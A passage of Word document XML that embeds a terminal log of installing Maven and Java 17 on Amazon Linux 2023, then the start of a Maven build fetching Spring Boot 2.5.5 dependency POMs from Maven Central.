    <w:p w14:paraId="4AD6AD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publicsuffix-list-20240212-61.amzn2023.noarch                                                        8/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D24D3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pixman-0.43.4-1.amzn2023.0.4.x86_64                                                                  9/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E949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libjpeg-turbo-2.1.4-2.amzn2023.0.5.x86_64                                                           10/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA5D8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libbrotli-1.0.9-4.amzn2023.0.2.x86_64                                                               11/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7C6F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libXau-1.0.11-6.amzn2023.0.1.x86_64                                                                 12/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD3E7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Installing       : libxcb-1.17.0-1.amzn2023.0.1.x86_64                                                                 13/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7756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libX11-common-1.8.10-2.amzn2023.0.1.noarch                                                          14/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303506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libX11-1.8.10-2.amzn2023.0.1.x86_64                                                                 15/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3A00B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libXext-1.3.6-1.amzn2023.0.1.x86_64                                                                 16/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353BA5E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libXrender-0.9.11-6.amzn2023.0.1.x86_64                                                             17/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C57AA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graphite2-1.3.14-7.amzn2023.0.2.x86_64                                                              18/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3DF41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google-noto-fonts-common-20201206-2.amzn2023.0.2.noarch                                             19/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CB0C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google-noto-sans-vf-fonts-20201206-2.amzn2023.0.2.noarch                                            20/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AA55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langpacks-core-font-en-3.0-21.amzn2023.0.4.noarch                                                   21/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069263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cairo-1.18.0-4.amzn2023.0.1.x86_64                                                                  22/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F89D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harfbuzz-7.0.0-2.amzn2023.0.2.x86_64                                                                23/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CD5B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freetype-2.13.2-5.amzn2023.0.1.x86_64                                                               24/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453B9E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fontconfig-2.13.94-2.amzn2023.0.2.x86_64                                                            25/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B35E7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Running scriptlet: fontconfig-2.13.94-2.amzn2023.0.2.x86_64                                                            25/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF115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alsa-lib-1.2.7.2-1.amzn2023.0.2.x86_64                                                              26/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DCB0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java-17-amazon-corretto-headless-1:17.0.15+6-1.amzn2023.1.x86_64                                    27/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4178B0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Running scriptlet: java-17-amazon-corretto-headless-1:17.0.15+6-1.amzn2023.1.x86_64                                    27/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E263E8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atinject-1.0.5-3.amzn2023.0.3.noarch                                                                28/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3930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plexus-utils-3.3.0-9.amzn2023.0.4.noarch                                                            29/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FA59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slf4j-1.7.32-3.amzn2023.0.4.noarch                                                                  30/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2758FE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apache-commons-io-1:2.8.0-7.amzn2023.0.4.noarch                                                     31/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C15B1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apache-commons-lang3-3.12.0-7.amzn2023.0.3.noarch                                                   32/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073EB1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httpcomponents-core-4.4.13-6.amzn2023.0.3.noarch                                                    33/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3625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jakarta-annotations-1.3.5-13.amzn2023.0.3.noarch                                                    34/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3747EC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plexus-cipher-1.8-3.amzn2023.0.3.noarch                                                             35/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D43BD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plexus-classworlds-2.6.0-10.amzn2023.0.4.noarch                                                     36/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC79C7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plexus-containers-component-annotations-2.1.0-9.amzn2023.0.4.noarch                                 37/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C9C00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plexus-sec-dispatcher-2.0-3.amzn2023.0.3.noarch                                                     38/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D93EC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maven-shared-utils-3.3.4-4.amzn2023.0.3.noarch                                                      39/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4A88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Installing       : jcl-over-slf4j-1.7.32-3.amzn2023.0.4.noarch                                                         40/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F58DF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cdi-api-2.0.2-6.amzn2023.0.3.noarch                                                                 41/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8047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sisu-1:0.3.4-9.amzn2023.0.4.noarch                                                                  42/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3754BF6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apache-commons-cli-1.5.0-3.amzn2023.0.3.noarch                                                      43/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493F4D2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apache-commons-codec-1.15-6.amzn2023.0.3.noarch                                                     44/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8075C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httpcomponents-client-4.5.13-4.amzn2023.0.4.noarch                                                  45/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07329F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jansi-2.4.0-3.amzn2023.0.3.x86_64                                                                   46/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1B97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java-17-amazon-corretto-devel-1:17.0.15+6-1.amzn2023.1.x86_64                                       47/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0992E7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Running scriptlet: java-17-amazon-corretto-devel-1:17.0.15+6-1.amzn2023.1.x86_64                                       47/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C13D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jsoup-1.16.1-4.amzn2023.0.2.noarch                                                                  48/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076DF6B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maven-wagon-3.4.2-6.amzn2023.0.4.noarch                                                             49/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209D7D6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maven-resolver-1:1.7.3-3.amzn2023.0.4.noarch                                                        50/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E0AC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jsr-305-3.0.2-5.amzn2023.0.4.noarch                                                                 51/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4609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guava-31.0.1-3.amzn2023.0.6.noarch                                                                  52/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEB631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google-guice-4.2.3-8.amzn2023.0.6.noarch                                                            53/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104627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plexus-interpolation-1.26-10.amzn2023.0.4.noarch                                                    54/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5D9D3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maven-lib-1:3.8.4-3.amzn2023.0.5.noarch                                                             55/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186634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maven-amazon-corretto17-1:3.8.4-3.amzn2023.0.5.noarch                                               56/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23ECAE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Installing       : maven-1:3.8.4-3.amzn2023.0.5.noarch                                                                 57/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FC37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Running scriptlet: maven-1:3.8.4-3.amzn2023.0.5.noarch                                                                 57/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF11C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Running scriptlet: fontconfig-2.13.94-2.amzn2023.0.2.x86_64                                                            57/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE4F19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Running scriptlet: maven-1:3.8.4-3.amzn2023.0.5.noarch                                                                 57/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3915B7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alsa-lib-1.2.7.2-1.amzn2023.0.2.x86_64                                                               1/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1126DA3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apache-commons-cli-1.5.0-3.amzn2023.0.3.noarch                                                       2/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8D91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apache-commons-codec-1.15-6.amzn2023.0.3.noarch                                                      3/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440DCD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apache-commons-io-1:2.8.0-7.amzn2023.0.4.noarch                                                      4/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608C2D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apache-commons-lang3-3.12.0-7.amzn2023.0.3.noarch                                                    5/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCB69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atinject-1.0.5-3.amzn2023.0.3.noarch                                                                 6/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229AD2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cairo-1.18.0-4.amzn2023.0.1.x86_64                                                                   7/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289110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Verifying        : cdi-api-2.0.2-6.amzn2023.0.3.noarch                                                                  8/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603FC1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dejavu-sans-fonts-2.37-16.amzn2023.0.2.noarch                                                        9/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E96A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dejavu-sans-mono-fonts-2.37-16.amzn2023.0.2.noarch                                                  10/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB4AF7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dejavu-serif-fonts-2.37-16.amzn2023.0.2.noarch                                                      11/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BB6D2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fontconfig-2.13.94-2.amzn2023.0.2.x86_64                                                            12/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C562D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fonts-filesystem-1:2.0.5-12.amzn2023.0.2.noarch                                                     13/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6129099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freetype-2.13.2-5.amzn2023.0.1.x86_64                                                               14/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E629F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google-guice-4.2.3-8.amzn2023.0.6.noarch                                                            15/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2890DE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google-noto-fonts-common-20201206-2.amzn2023.0.2.noarch                                             16/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C46B1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google-noto-sans-vf-fonts-20201206-2.amzn2023.0.2.noarch                                            17/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024CE7B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graphite2-1.3.14-7.amzn2023.0.2.x86_64                                                              18/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6103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guava-31.0.1-3.amzn2023.0.6.noarch                                                                  19/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CAB1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harfbuzz-7.0.0-2.amzn2023.0.2.x86_64                                                                20/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020DF3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httpcomponents-client-4.5.13-4.amzn2023.0.4.noarch                                                  21/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5229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httpcomponents-core-4.4.13-6.amzn2023.0.3.noarch                                                    22/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27092C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jakarta-annotations-1.3.5-13.amzn2023.0.3.noarch                                                    23/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EADA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jansi-2.4.0-3.amzn2023.0.3.x86_64                                                                   24/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC5293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java-17-amazon-corretto-devel-1:17.0.15+6-1.amzn2023.1.x86_64                                       25/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCBF9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java-17-amazon-corretto-headless-1:17.0.15+6-1.amzn2023.1.x86_64                                    26/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F34619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javapackages-filesystem-6.0.0-7.amzn2023.0.6.noarch                                                 27/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7791B2D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jcl-over-slf4j-1.7.32-3.amzn2023.0.4.noarch                                                         28/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8747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jsoup-1.16.1-4.amzn2023.0.2.noarch                                                                  29/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDBB3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jsr-305-3.0.2-5.amzn2023.0.4.noarch                                                                 30/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A79C97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langpacks-core-font-en-3.0-21.amzn2023.0.4.noarch                                                   31/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D33B5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libX11-1.8.10-2.amzn2023.0.1.x86_64                                                                 32/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D32B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libX11-common-1.8.10-2.amzn2023.0.1.noarch                                                          33/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373220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libXau-1.0.11-6.amzn2023.0.1.x86_64                                                                 34/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192489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libXext-1.3.6-1.amzn2023.0.1.x86_64                                                                 35/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BA94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libXrender-0.9.11-6.amzn2023.0.1.x86_64                                                             36/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E8EF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Verifying        : libbrotli-1.0.9-4.amzn2023.0.2.x86_64                                                               37/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044551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libjpeg-turbo-2.1.4-2.amzn2023.0.5.x86_64                                                           38/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724E28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libpng-2:1.6.37-10.amzn2023.0.6.x86_64                                                              39/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B71FC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libxcb-1.17.0-1.amzn2023.0.1.x86_64                                                                 40/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE2FE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maven-1:3.8.4-3.amzn2023.0.5.noarch                                                                 41/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055491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maven-amazon-corretto17-1:3.8.4-3.amzn2023.0.5.noarch                                               42/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18609A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maven-lib-1:3.8.4-3.amzn2023.0.5.noarch                                                             43/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1C968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maven-resolver-1:1.7.3-3.amzn2023.0.4.noarch                                                        44/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC6B0E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maven-shared-utils-3.3.4-4.amzn2023.0.3.noarch                                                      45/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7D3F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maven-wagon-3.4.2-6.amzn2023.0.4.noarch                                                             46/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590634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pixman-0.43.4-1.amzn2023.0.4.x86_64                                                                 47/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E08C6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plexus-cipher-1.8-3.amzn2023.0.3.noarch                                                             48/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B2D6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plexus-classworlds-2.6.0-10.amzn2023.0.4.noarch                                                     49/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D4AA6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plexus-containers-component-annotations-2.1.0-9.amzn2023.0.4.noarch                                 50/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9A2E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plexus-interpolation-1.26-10.amzn2023.0.4.noarch                                                    51/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF5B7D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plexus-sec-dispatcher-2.0-3.amzn2023.0.3.noarch                                                     52/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139B86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plexus-utils-3.3.0-9.amzn2023.0.4.noarch                                                            53/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507C43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publicsuffix-list-20240212-61.amzn2023.noarch                                                       54/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2A75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sisu-1:0.3.4-9.amzn2023.0.4.noarch                                                                  55/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D7AF2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slf4j-1.7.32-3.amzn2023.0.4.noarch                                                                  56/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42668A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Verifying        : xml-common-0.6.3-56.amzn2023.0.2.noarch                                                             57/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D3F1AD" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47EB6D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Installed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE46B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alsa-lib-1.2.7.2-1.amzn2023.0.2.x86_64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF9D7A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apache-commons-cli-1.5.0-3.amzn2023.0.3.noarch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D36EE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apache-commons-codec-1.15-6.amzn2023.0.3.noarch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675234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apache-commons-io-1:2.8.0-7.amzn2023.0.4.noarch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BDFF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apache-commons-lang3-3.12.0-7.amzn2023.0.3.noarch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F022D6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atinject-1.0.5-3.amzn2023.0.3.noarch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019486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cairo-1.18.0-4.amzn2023.0.1.x86_64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E8C0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cdi-api-2.0.2-6.amzn2023.0.3.noarch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312525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dejavu-sans-fonts-2.37-16.amzn2023.0.2.noarch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7928361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dejavu-sans-mono-fonts-2.37-16.amzn2023.0.2.noarch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B0CE0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dejavu-serif-fonts-2.37-16.amzn2023.0.2.noarch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DDA8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fontconfig-2.13.94-2.amzn2023.0.2.x86_64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9835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fonts-filesystem-1:2.0.5-12.amzn2023.0.2.noarch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434E97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freetype-2.13.2-5.amzn2023.0.1.x86_64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390AF8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google-guice-4.2.3-8.amzn2023.0.6.noarch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F143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google-noto-fonts-common-20201206-2.amzn2023.0.2.noarch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C21C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google-noto-sans-vf-fonts-20201206-2.amzn2023.0.2.noarch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD8F4D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graphite2-1.3.14-7.amzn2023.0.2.x86_64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0134BC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guava-31.0.1-3.amzn2023.0.6.noarch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3C24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harfbuzz-7.0.0-2.amzn2023.0.2.x86_64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2154BB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httpcomponents-client-4.5.13-4.amzn2023.0.4.noarch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA732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httpcomponents-core-4.4.13-6.amzn2023.0.3.noarch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4CBD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jakarta-annotations-1.3.5-13.amzn2023.0.3.noarch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A11676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jansi-2.4.0-3.amzn2023.0.3.x86_64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B89A5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java-17-amazon-corretto-devel-1:17.0.15+6-1.amzn2023.1.x86_64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D05866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java-17-amazon-corretto-headless-1:17.0.15+6-1.amzn2023.1.x86_64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6801B0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javapackages-filesystem-6.0.0-7.amzn2023.0.6.noarch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DDEA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jcl-over-slf4j-1.7.32-3.amzn2023.0.4.noarch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1382F0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jsoup-1.16.1-4.amzn2023.0.2.noarch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2160E07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jsr-305-3.0.2-5.amzn2023.0.4.noarch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C908D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langpacks-core-font-en-3.0-21.amzn2023.0.4.noarch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70879D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libX11-1.8.10-2.amzn2023.0.1.x86_64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAF3B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libX11-common-1.8.10-2.amzn2023.0.1.noarch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66992C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libXau-1.0.11-6.amzn2023.0.1.x86_64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4C73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libXext-1.3.6-1.amzn2023.0.1.x86_64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FDA9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libXrender-0.9.11-6.amzn2023.0.1.x86_64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564975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libbrotli-1.0.9-4.amzn2023.0.2.x86_64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2651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libjpeg-turbo-2.1.4-2.amzn2023.0.5.x86_64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681B55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libpng-2:1.6.37-10.amzn2023.0.6.x86_64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA0313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libxcb-1.17.0-1.amzn2023.0.1.x86_64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8CBA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maven-1:3.8.4-3.amzn2023.0.5.noarch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DB07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maven-amazon-corretto17-1:3.8.4-3.amzn2023.0.5.noarch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAF4B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maven-lib-1:3.8.4-3.amzn2023.0.5.noarch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E795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maven-resolver-1:1.7.3-3.amzn2023.0.4.noarch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174EA8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maven-shared-utils-3.3.4-4.amzn2023.0.3.noarch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAEDB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maven-wagon-3.4.2-6.amzn2023.0.4.noarch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32330F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pixman-0.43.4-1.amzn2023.0.4.x86_64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEE4A2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plexus-cipher-1.8-3.amzn2023.0.3.noarch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9E906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plexus-classworlds-2.6.0-10.amzn2023.0.4.noarch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7115C2A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plexus-containers-component-annotations-2.1.0-9.amzn2023.0.4.noarch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD9BD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plexus-interpolation-1.26-10.amzn2023.0.4.noarch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E35F4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plexus-sec-dispatcher-2.0-3.amzn2023.0.3.noarch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370444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plexus-utils-3.3.0-9.amzn2023.0.4.noarch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D73E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publicsuffix-list-20240212-61.amzn2023.noarch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1182D5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sisu-1:0.3.4-9.amzn2023.0.4.noarch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633FE44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slf4j-1.7.32-3.amzn2023.0.4.noarch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2524E7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xml-common-0.6.3-56.amzn2023.0.2.noarch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C7BD2B" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70B0E2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Complete!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE783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-v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B981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Apache Maven 3.8.4 (Red Hat 3.8.4-3.amzn2023.0.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBC60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Maven home: /usr/share/maven</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DBC5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Java version: 17.0.15, vendor: Amazon.com Inc., runtime: /usr/lib/jvm/java-17-amazon-corretto.x86_64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523DAE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Default locale: en, platform encoding: UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236B226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OS name: "linux", version: "6.1.134-152.225.amzn2023.x86_64", arch: "amd64", family: "unix"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60132D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clean package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACCD7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7F76773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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-starter-parent/2.5.5/spring-boot-starter-parent-2.5.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC96DB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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-starter-parent/2.5.5/spring-boot-starter-parent-2.5.5.pom (8.6 kB at 15 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10842B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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-dependencies/2.5.5/spring-boot-dependencies-2.5.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398D60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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-dependencies/2.5.5/spring-boot-dependencies-2.5.5.pom (109 kB at 1.3 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC931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https://repo.maven.apache.org/maven2/com/datastax/oss/java-driver-bom/4.11.3/java-driver-bom-4.11.3.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646DD5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https://repo.maven.apache.org/maven2/com/datastax/oss/java-driver-bom/4.11.3/java-driver-bom-4.11.3.pom (4.1 kB at 99 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A6DFC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https://repo.maven.apache.org/maven2/io/dropwizard/metrics/metrics-bom/4.1.25/metrics-bom-4.1.25.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E4002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https://repo.maven.apache.org/maven2/io/dropwizard/metrics/metrics-bom/4.1.25/metrics-bom-4.1.25.pom (5.3 kB at 136 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E5D1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https://repo.maven.apache.org/maven2/io/dropwizard/metrics/metrics-parent/4.1.25/metrics-parent-4.1.25.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C984C7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https://repo.maven.apache.org/maven2/io/dropwizard/metrics/metrics-parent/4.1.25/metrics-parent-4.1.25.pom (17 kB at 458 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B9C2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https://repo.maven.apache.org/maven2/org/codehaus/groovy/groovy-bom/3.0.9/groovy-bom-3.0.9.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7663AF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https://repo.maven.apache.org/maven2/org/codehaus/groovy/groovy-bom/3.0.9/groovy-bom-3.0.9.pom (26 kB at 677 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69414F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https://repo.maven.apache.org/maven2/org/infinispan/infinispan-bom/12.1.7.Final/infinispan-bom-12.1.7.Final.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099151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https://repo.maven.apache.org/maven2/org/infinispan/infinispan-bom/12.1.7.Final/infinispan-bom-12.1.7.Final.pom (18 kB at 402 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E435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https://repo.maven.apache.org/maven2/org/infinispan/infinispan-build-configuration-parent/12.1.7.Final/infinispan-build-configuration-parent-12.1.7.Final.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDA613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https://repo.maven.apache.org/maven2/org/infinispan/infinispan-build-configuration-parent/12.1.7.Final/infinispan-build-configuration-parent-12.1.7.Final.pom (14 kB at 365 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D033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https://repo.maven.apache.org/maven2/org/jboss/jboss-parent/36/jboss-parent-36.pom</w:t>
      </w:r>
    </w:p>
